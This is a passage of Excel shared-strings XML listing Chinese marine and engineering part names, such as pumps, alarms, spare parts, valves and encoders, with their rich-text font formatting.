    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护阳极</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保温联轴节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保温联轴节，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警，推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警线图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警用支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>爆裂帽总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>爆压齿条工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备车铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件分类</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件和备用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件和工具清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用泵的吸入管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用泵自动起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用套环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用套环安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用油泵齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用油预过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵传动装置中间轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵的滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵滑油支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵基础</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵模型安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵燃油进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵套筒检查仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵特性</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵用控制油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵组布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵组软管连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例阀适配板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例压力防爆门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合装置，布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭合装置总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭滤子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭锁塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭锁式气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>避开</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>臂支撑总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>边缘保护橡胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编程说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编码器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编码器安装支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编码器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编排</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (75-100MM)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢焊接质量说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变频器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变送器盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>便携式压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签文件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准备件部分提供</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准上紧力矩，数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准替换件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准仪表接头清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丙烯板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
